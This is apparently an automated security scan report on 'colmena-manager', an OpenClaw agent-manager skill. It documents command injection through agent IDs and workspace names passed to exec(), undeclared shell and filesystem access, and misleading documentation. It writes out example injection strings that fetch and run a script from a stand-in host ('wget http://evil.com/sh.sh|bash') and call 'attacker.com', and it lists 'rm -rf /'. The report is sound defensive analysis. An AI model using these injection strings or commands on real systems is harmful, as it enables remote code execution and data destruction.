Security Decision Report

colmena-manager

Skill presents as a legitimate OpenClaw agent manager but contains multiple command-injection vulnerabilities from unsanitized user-controlled input piped into shell commands, with shell execution entirely undeclared in documentation.

Install decision first · Source: manual upload · Scan time: 2026/4/4

Files: 5
IOCs: 3
Privilege overreach items: 2
Findings: 6
Most direct threat evidence

01 Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash') · reconnaissance · src/index.js
02 Victim runs 'colmena-manager health-check' to monitor the hive · initial entry · src/index.js
03 healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains unsanitized shell metacharacters from step 1 · privilege escalation · src/index.js

Why this conclusion was reached

3 of 4 dimensions triggered

Block · Declared vs actual capabilities
Found 2 capabilities or privilege overreaches beyond what is declared.

Block · Hidden execution and outbound connections
Extracted 1 high-risk IOC or outbound signal.

Block · Attack chain and high-risk findings
The report contains a 4-step attack chain, plus 3 high or critical findings.

Pass · Dependencies and supply-chain hygiene
A dependency structure exists, but no obvious high-risk alerts have been seen so far.

Attack chain

01 Attacker registers a malicious agent with shell metacharacters in the ID (e.g., 'vision; wget http://evil.com/sh.sh|bash')
   reconnaissance · src/index.js:12

02 Victim runs 'colmena-manager health-check' to monitor the hive
   initial entry · src/index.js:120

03 healthCheck() calls exec() with ps aux | grep ${agent.id}, where agent.id contains unsanitized shell metacharacters from step 1
   privilege escalation · src/index.js:131

04 Shell injection executes arbitrary commands (download + execute remote script) with the permissions of the running user
   final impact · src/index.js:131

How the risk score was driven up

Undeclared shell execution +15

SKILL.md describes only OpenClaw API calls (agents_list, sessions_list, sessions_send) but never mentions exec() shell commands used throughout src/index.js

Command injection — agentId +15

agentId from API responses is interpolated into shell commands in logs() (line 66), healthCheck() (line 131), and checkMemory() (line 162) without sanitization

Command injection — workspace name +10

workspace name (user-controlled CLI argument) is directly interpolated into rm -rf command in workspaceRemove() (line 193); path traversal possible

Missing allowed-tools declaration +5

Neither SKILL.md nor claws.json declares shell:WRITE or filesystem:WRITE permissions required by the exec() calls

Hardcoded user path dependency +3

All paths hardcoded to /home/nvi/ — a specific user account not mentioned as a prerequisite

Non-existent HEARTBEAT.md referenced +2

SKILL.md advertises HEARTBEAT.md for automatic 30-min health checks but the file does not exist in the project

Most critical evidence

High · Code execution

Command injection via agentId in multiple exec() calls

The agentId parameter (sourced from the agents_list API response) is directly interpolated into shell commands via template literals in three separate locations: logs() at line 66, healthCheck() at line 131, and checkMemory() at line 162. An attacker who registers a malicious agent with shell metacharacters in the ID (e.g., 'main; curl http://attacker.com') can achieve arbitrary command execution on the host when any of these commands are invoked.

Location: src/index.js:66
Recommendation: Validate agentId against a strict alphanumeric/whitelist pattern before using it in any shell command. Use OpenClaw's native session API instead of shell tail for log retrieval.
High · Code execution

Command injection via workspace name in rm -rf

The workspace name argument passed to workspaceRemove() is directly interpolated into an rm -rf shell command without sanitization. While the base path /home/nvi/.openclaw/workspace- provides some containment, path traversal sequences like '../../../' could escape the intended directory and delete arbitrary files on the system as the executing user.

Location: src/index.js:193
Recommendation: Validate the workspace name against a strict pattern (e.g., /^[a-z0-9-]+$/). Use Node.js fs.rmSync() with a verified absolute path instead of shell rm. Add a confirmation prompt before destructive operations.
High · Documentation deception

Shell execution completely absent from SKILL.md

SKILL.md's API section lists only OpenClaw native functions (agents_list, sessions_list, sessions_send, message, exec/process). It never discloses that exec() is used to run arbitrary shell commands (tail, ps, grep, awk, ls, mkdir, rm). Users deploying this skill have no indication that it requires shell:WRITE permissions or executes system commands.

Location: SKILL.md:55
Recommendation: SKILL.md must explicitly declare the shell:WRITE permission and list each shell command used. Users must give informed consent before a skill can execute system commands.
Medium · Documentation deception

Referenced HEARTBEAT.md does not exist

SKILL.md advertises an automatic heartbeat script (HEARTBEAT.md) that runs every 30 minutes for health monitoring. This file is referenced in both SKILL.md and README.md but does not exist in the project. This is either an incomplete feature or documentation that overstates capabilities.

Location: SKILL.md:64
Recommendation: Either implement HEARTBEAT.md or remove all references to it from the documentation. If implemented, declare its resource requirements explicitly.
Medium · Privilege escalation

No allowed-tools declaration despite full shell/filesystem access

claws.json and SKILL.md do not declare any allowed-tools. The skill uses exec() for shell:WRITE operations (tail, ps, grep, awk, ls, mkdir, rm) and filesystem:WRITE operations (mkdir, rm -rf) across multiple methods. These permissions are entirely absent from any manifest, preventing the host AI from properly scoping the skill's capabilities.

Location: claws.json:1
Recommendation: Add an allowed-tools declaration to claws.json: {"tools": [{"name": "Bash", "resource": "shell", "level": "WRITE"}, {"name": "Write", "resource": "filesystem", "level": "WRITE"}]}
Low · Sensitive access

Hardcoded /home/nvi/ path creates dependency on a specific user account

All file operations (logs, workspaces) hardcode /home/nvi/ as the base path. This is not declared as a prerequisite, and the path does not appear in the SKILL.md requirements. The skill will silently fail on systems where this user does not exist.

Location: src/index.js:66
Recommendation: Derive the OpenClaw data directory from an environment variable (e.g., OPENCLAW_HOME or XDG_DATA_HOME) or make it a configurable parameter.

Declared vs actual capabilities

Command execution · Block
  Declared: NONE
  Inferred: WRITE
  Evidence: src/index.js:66 exec with tail | src/index.js:131 exec with ps|grep | src/index.js:162 exec with ps|grep|awk | src/index.js:193 exec with rm

Filesystem · Block
  Declared: NONE
  Inferred: WRITE
  Evidence: src/index.js:188 mkdir via exec | src/index.js:193 rm -rf via exec

Skill invocation · Pass
  Declared: NONE
  Inferred: READ
  Evidence: src/index.js:13 agents_list, sessions_list, sessions_send (matches the SKILL.md API section)

Suspicious artifacts and outbound connections

Critical · Dangerous command
rm -rf /
src/index.js:193

Medium · External URL
https://clawhub.com/colmena-manager
claws.json:15

Info · Email
[email protected]
claws.json:18

Dependencies and supply chain

Package  | Version | Source         | Vulnerabilities / Notes
openclaw | >=1.0.0 | npm (peer dep) | Peer dependency, not bundled. No known vulnerabilities.

File composition

5 files · 552 lines
JavaScript: 1 file · 289 lines
Markdown: 2 files · 211 lines
JSON: 2 files · 52 lines

Files needing attention · 3
src/index.js (JavaScript · 289 lines)
  Command injection via agentId in multiple exec() calls · Command injection via workspace name in rm -rf · Hardcoded /home/nvi/ path creates dependency on a specific user account · rm -rf /
SKILL.md (Markdown · 175 lines)
  Shell execution completely absent from SKILL.md · Referenced HEARTBEAT.md does not exist
claws.json (JSON · 31 lines)
  No allowed-tools declaration despite full shell/filesystem access · https://clawhub.com/colmena-manager · [email protected]
Other files · README.md · package.json

Security highlights

Skill implements its stated functionality (agent management) without additional hidden data exfiltration
No base64-encoded payloads or obfuscated code blocks found
No credential harvesting from ~/.ssh, ~/.aws, or .env files
No network requests to external IPs detected
No reverse shell, C2, or data theft mechanisms present
No cron/scheduled task persistence mechanisms found
No malicious dependencies detected; package.json has minimal legitimate dependencies